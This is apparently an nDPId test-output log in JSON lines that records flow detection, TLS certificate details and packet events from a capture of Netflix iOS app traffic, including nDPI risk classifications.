+00976{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":913,"source":"netflix.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1484319049672,"flow_last_seen":1484319049753,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1664,"flow_avg_l4_payload_len":277,"midstream":0,"thread_ts_msec":1484319049753,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"184.25.204.24","src_port":53153,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"25": {"risk":"HTTP Suspicious Content","severity":"High","risk_score": {"total":510,"client":355,"server":155}}},"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": {"hostname":"tp.akam.nflximg.com","url":"tp.akam.nflximg.com\/tpa3\/616\/2041779616.bif","code":200,"content_type":"text\/plain","user_agent":"Argo\/900 CFNetwork\/808.2.16 Darwin\/16.3.0"}} 
+01018{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":920,"source":"netflix.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1484319049684,"flow_last_seen":1484319049807,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1965,"flow_avg_l4_payload_len":327,"midstream":0,"thread_ts_msec":1484319049807,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.191.17.51","src_port":53162,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ios.nccp.netflix.com","ja3":"dc67ac8aaf8d7f69ecd6598135448f24","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}} +01358{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":923,"source":"netflix.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1484319049684,"flow_last_seen":1484319049850,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":3045,"flow_avg_l4_payload_len":435,"midstream":0,"thread_ts_msec":1484319049850,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.191.17.51","src_port":53162,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"ios.nccp.netflix.com","server_names":"*.nccp.netflix.com","ja3":"dc67ac8aaf8d7f69ecd6598135448f24","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"CN=Primary Certificate Authority (2009), ST=California, C=US, O=Netflix Inc, OU=Electronic Delivery, L=Los Gatos","subjectDN":"CN=*.nccp.netflix.com, O=Netflix, Inc., OU=Operations, C=US, ST=California, L=Los Gatos","fingerprint":"97:F6:63:95:8F:F2:5E:E0:80:12:5A:FD:BF:B2:EB:FE:A2:FE:72:33"}} +00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":968,"source":"netflix.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319050652,"flow_last_seen":1484319050652,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1484319050652,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.145","src_port":53163,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":968,"source":"netflix.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":1,"flow_last_seen":1484319050652,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1484319050652,"pkt":"gCqoTGHM5JjWH70UCABFAABA2xBAAEAGenHAqAEHF\/YLkc+rAFC8XkCtAAAAALAC\/\/9pzAAAAgQFtAEDAwUBAQgKH2T7jgAAAAAEAgAA"} 
+00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":970,"source":"netflix.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":2,"flow_last_seen":1484319050677,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1484319050677,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAADsGWmYX9guRwKgBBwBQz6susPTdvF5ArqAS\/\/\/2WQAAAgQFtAEDAwkEAggKRVwbeB9k+44="} +00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":971,"source":"netflix.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":3,"flow_last_seen":1484319050678,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319050678,"pkt":"gCqoTGHM5JjWH70UCABFAAA0kSxAAEAGxGHAqAEHF\/YLkc+rAFC8XkCuLrD03oAQEBUU+gAAAQEICh9k+6dFXBt4"} +01128{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":972,"source":"netflix.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319050652,"flow_last_seen":1484319050682,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":356,"flow_tot_l4_payload_len":356,"flow_avg_l4_payload_len":89,"midstream":0,"thread_ts_msec":1484319050682,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.145","src_port":53163,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": 
{"hostname":"23.246.11.145","url":"23.246.11.145\/range\/0-65535?o=AQEfKq2oMrLRiWL-p-VeIZ6WKRq-X6LMvaLqgxWBCuFbh09MpreORUUOO5Tx1683HPnLY6BPjN_9mlDuYihGZoXu9u0ozH8RFioBN_JDNiRscidjvoSdWmlyZgPNansW0lkBr4X81HvloOi8BS_exVSPhMyJQTB5bg&v=3&e=1484347850&t=5xfYVtna3GdYXL71uNs6DZ-X84Y&random=3930708224","code":0,"content_type":"","user_agent":"netflix-ios-app"}} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1027,"source":"netflix.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319052216,"flow_last_seen":1484319052216,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1484319052216,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.10.139","src_port":53164,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1027,"source":"netflix.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":1,"flow_last_seen":1484319052216,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1484319052216,"pkt":"gCqoTGHM5JjWH70UCABFAABAN3hAAEAGHxDAqAEHF\/YKi8+sAFBgdy0VAAAAALAC\/\/\/UZQAAAgQFtAEDAwUBAQgKH2UBeQAAAAAEAgAA"} +00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1031,"source":"netflix.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":2,"flow_last_seen":1484319052235,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1484319052235,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAADsGW2wX9gqLwKgBBwBQz6xlmlqWYHctFqAS\/\/8JBgAAAgQFtAEDAwkEAggKQI7bkB9lAXk="} 
+00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1032,"source":"netflix.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":3,"flow_last_seen":1484319052237,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319052237,"pkt":"gCqoTGHM5JjWH70UCABFAAA0JFZAAEAGMj7AqAEHF\/YKi8+sAFBgdy0WZZpal4AQEBUnrAAAAQEICh9lAYxAjtuQ"} +01129{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1033,"source":"netflix.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319052216,"flow_last_seen":1484319052242,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":356,"flow_tot_l4_payload_len":356,"flow_avg_l4_payload_len":89,"midstream":0,"thread_ts_msec":1484319052242,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.10.139","src_port":53164,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": {"hostname":"23.246.10.139","url":"23.246.10.139\/range\/0-65535?o=AQEfKq2oMrLRiWL-p-VeIZ6WKRq-X6LMvaLqgxWBCuFbh09MpreORUUOO5Tx1683HPnLY6BPjN_9mlDuYihGZoXu9u0ozH8RFioBN_JDNiRscidjvoSdWmlyZgPNansW0lkBr4X81HvloOi8BS_exVSPhMyJQTB5bg&v=3&e=1484347850&t=-djGXIcbFBNzyfugqEWcrgtCpyY&random=3407360776","code":0,"content_type":"","user_agent":"netflix-ios-app"}} 
+00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1100,"source":"netflix.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319054101,"flow_last_seen":1484319054101,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1484319054101,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.3.140","src_port":53171,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1100,"source":"netflix.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":1,"flow_last_seen":1484319054101,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1484319054101,"pkt":"gCqoTGHM5JjWH70UCABFAABA9bFAAEAGZ9XAqAEHF\/YDjM+zAFBtwXYMAAAAALAC\/\/99\/AAAAgQFtAEDAwUBAQgKH2UImQAAAAAEAgAA"} +00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1101,"source":"netflix.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":2,"flow_last_seen":1484319054132,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1484319054132,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAADgGZWsX9gOMwKgBBwBQz7OFwt93bcF2DaAS\/\/\/aJAAAAgQFtAEDAwkEAggKhKDK7B9lCJk="} 
+00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1102,"source":"netflix.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":3,"flow_last_seen":1484319054134,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319054134,"pkt":"gCqoTGHM5JjWH70UCABFAAA0mQ1AAEAGxIXAqAEHF\/YDjM+zAFBtwXYNhcLfeIAQEBX4vQAAAQEICh9lCLmEoMrs"} +01125{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1103,"source":"netflix.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319054101,"flow_last_seen":1484319054139,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":354,"flow_tot_l4_payload_len":354,"flow_avg_l4_payload_len":88,"midstream":0,"thread_ts_msec":1484319054139,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.3.140","src_port":53171,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": {"hostname":"23.246.3.140","url":"23.246.3.140\/range\/0-65535?o=AQEfKq2oMrLRiWL-p-VeIZ6WKRq-X6LMvaLqgxWBCuFbh09MpreORUUOO5Tx1683HPnLY6BPjN_9mlDuYihGZoXu9u0ozH8RFioBN_JDNiRscidjvoSdWmlyZgPNansW0lkBr4X81HvloOi8BS_exVSPhMyJQTB5bg&v=3&e=1484347850&t=-8u4vlcPuFqcOLnLyb9DDtK-bB4&random=357509657","code":0,"content_type":"","user_agent":"netflix-ios-app"}} 
+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1231,"source":"netflix.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319056204,"flow_last_seen":1484319056204,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1484319056204,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.133","src_port":53172,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1231,"source":"netflix.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":1,"flow_last_seen":1484319056204,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1484319056204,"pkt":"gCqoTGHM5JjWH70UCABFAABAfy9AAEAG1l7AqAEHF\/YLhc+0AFDwxwoWAAAAALAC\/\/9XEAAAAgQFtAEDAwUBAQgKH2UQewAAAAAEAgAA"} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1232,"source":"netflix.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319056210,"flow_last_seen":1484319056210,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1484319056210,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.133","src_port":53173,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1232,"source":"netflix.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":1,"flow_last_seen":1484319056210,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1484319056210,"pkt":"gCqoTGHM5JjWH70UCABFAABAc11AAEAG4jDAqAEHF\/YLhc+1AFCjZhjfAAAAALAC\/\/+VoQAAAgQFtAEDAwUBAQgKH2UQgQAAAAAEAgAA"} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1233,"source":"netflix.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319056214,"flow_last_seen":1484319056214,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1484319056214,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53174,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1233,"source":"netflix.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":1,"flow_last_seen":1484319056214,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1484319056214,"pkt":"gCqoTGHM5JjWH70UCABFAABAlQtAAEAGwHrAqAEHF\/YLjc+2AFBDrGT6AAAAALAC\/\/+pMwAAAgQFtAEDAwUBAQgKH2UQhQAAAAAEAgAA"} 
+00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1234,"source":"netflix.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":2,"flow_last_seen":1484319056215,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1484319056215,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAADsGWnIX9guFwKgBBwBQz7RnATKV8McKF6AS\/\/8JWwAAAgQFtAEDAwkEAggKNWmPpR9lEHs="} +00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1235,"source":"netflix.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":3,"flow_last_seen":1484319056219,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319056219,"pkt":"gCqoTGHM5JjWH70UCABFAAA0oIhAAEAGtRHAqAEHF\/YLhc+0AFDwxwoXZwEyloAQEBUoBwAAAQEICh9lEIg1aY+l"} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1236,"source":"netflix.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319056221,"flow_last_seen":1484319056221,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1484319056221,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53175,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1236,"source":"netflix.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":1,"flow_last_seen":1484319056221,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1484319056221,"pkt":"gCqoTGHM5JjWH70UCABFAABAtyBAAEAGnmXAqAEHF\/YLjc+3AFC7qylgAAAAALAC\/\/9syQAAAgQFtAEDAwUBAQgKH2UQiQAAAAAEAgAA"} +01131{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1237,"source":"netflix.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319056204,"flow_last_seen":1484319056222,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":358,"flow_tot_l4_payload_len":358,"flow_avg_l4_payload_len":89,"midstream":0,"thread_ts_msec":1484319056222,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.133","src_port":53172,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": {"hostname":"23.246.11.133","url":"23.246.11.133\/range\/0-65535?o=AQEfKq2oMrLRiWL1ouVaJpeQLBWjGLjSseu23V2HX6kIiU9JpbCaBxxaIoz21qQNKuDUaOIZwdTlx23DMVxabbCwmvEluipDW2tvFMlhMRtwdhhVlbv9KGFabiu5KH0Slx0VjOK_wzThp_7lHhWA4kW9gayYEWtjNNKe&v=3&e=1484347850&t=JfEef80K02ynIjLLoi-HZB1uQ10&random=2473336513","code":0,"content_type":"","user_agent":"netflix-ios-app"}} 
+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1238,"source":"netflix.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319056232,"flow_last_seen":1484319056232,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1484319056232,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53176,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1238,"source":"netflix.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":1,"flow_last_seen":1484319056232,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1484319056232,"pkt":"gCqoTGHM5JjWH70UCABFAABA7BpAAEAGaWvAqAEHF\/YLjc+4AFBql8CVAAAAALAC\/\/8mpAAAAgQFtAEDAwUBAQgKH2UQjAAAAAAEAgAA"} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1239,"source":"netflix.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319056233,"flow_last_seen":1484319056233,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1484319056233,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53177,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1239,"source":"netflix.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":1,"flow_last_seen":1484319056233,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1484319056233,"pkt":"gCqoTGHM5JjWH70UCABFAABALEhAAEAGKT7AqAEHF\/YLjc+5AFBMFfUEAAAAALAC\/\/8QsgAAAgQFtAEDAwUBAQgKH2UQkAAAAAAEAgAA"} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1240,"source":"netflix.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319056233,"flow_last_seen":1484319056233,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1484319056233,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53178,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1240,"source":"netflix.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":1,"flow_last_seen":1484319056233,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1484319056233,"pkt":"gCqoTGHM5JjWH70UCABFAABACXBAAEAGTBbAqAEHF\/YLjc+6AFDVkM0AAAAAALAC\/\/+vNgAAAgQFtAEDAwUBAQgKH2UQkwAAAAAEAgAA"} 
+00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1241,"source":"netflix.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":2,"flow_last_seen":1484319056234,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1484319056234,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAADsGWnIX9guFwKgBBwBQz7VYH\/mqo2YY4KAS\/\/\/lFwAAAgQFtAEDAwkEAggKL5BAHx9lEIE="} +00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1242,"source":"netflix.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":2,"flow_last_seen":1484319056234,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1484319056234,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAADsGWmoX9guNwKgBBwBQz7YrOmTYQ6xk+6AS\/\/\/4+gAAAgQFtAEDAwkEAggKJ9gJPh9lEIU="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1243,"source":"netflix.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319056234,"flow_last_seen":1484319056234,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1484319056234,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53179,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1243,"source":"netflix.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":1,"flow_last_seen":1484319056234,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1484319056234,"pkt":"gCqoTGHM5JjWH70UCABFAABATZFAAEAGB\/XAqAEHF\/YLjc+7AFDfu3VVAAAAALAC\/\/\/8sgAAAgQFtAEDAwUBAQgKH2UQlgAAAAAEAgAA"} +00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1244,"source":"netflix.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":3,"flow_last_seen":1484319056235,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319056235,"pkt":"gCqoTGHM5JjWH70UCABFAAA09NVAAEAGYMTAqAEHF\/YLhc+1AFCjZhjgWB\/5q4AQEBUDvAAAAQEICh9lEJYvkEAf"} 